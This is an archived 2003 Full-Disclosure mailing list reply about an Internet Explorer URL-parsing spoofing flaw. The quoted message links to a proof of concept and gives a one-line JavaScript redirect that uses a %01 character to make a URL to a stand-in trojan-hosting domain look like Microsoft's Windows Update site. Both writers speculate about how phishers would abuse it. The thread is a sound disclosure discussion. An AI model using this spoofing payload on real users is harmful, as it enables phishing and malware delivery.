lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list] 
From: clint at secureconsulting.com (Clint Bodungen)
Subject: RE: FWD: Internet Explorer URL parsing vulnerability

I don't really think it will make that much of a difference their profits
considering anyone dumb enough to fall for those scams isn't going to know
the difference between an IP address in the URL box and a "spoofed" domain.
I had a client fall for an eBay scam and the end resulting domain in the URL
box was damn near www.robbingyoublinddamngringo.com.  I can see where a more
effective scam would be, like you hinted at, the infamous microsoft security
update emails.


----- Original Message ----- 
From: "S G Masood" <sgmasood@...oo.com>
To: <full-disclosure@...ts.netsys.com>
Sent: Tuesday, December 09, 2003 12:22 PM
Subject: [Full-Disclosure] RE: FWD: Internet Explorer URL parsing
vulnerability


>
> LOL. This is so simple and dangerous, it almost made
> me laugh and cry at the same time. Most of you will
> realise why...;D
> The Paypal, AOL, Visa, Mastercard, et al email
> scammers will have a harvest of gold this month with
> lots of zombies falling for this simple technique.
>
> ># POC ##########
> >http://www.zapthedingbat.com/security/ex01/vun1.htm
>
> Dont be surprised if your latest download from
> http://www.microsoft.com turns out to be a trojan!
>
>
location.href=unescape('http://windowsupdate.microsoft.com%01@...edownloadan
eviltrojanfromme.com);
>
>
> --
> S.G.Masood
>
> Hyderabad,
> India
>
> PS: One more thing - no scripting required to exploit this.
>
> __________________________________
> Do you Yahoo!?
> Free Pop-Up Blocker - Get it now
> http://companion.yahoo.com/
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
>
>

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ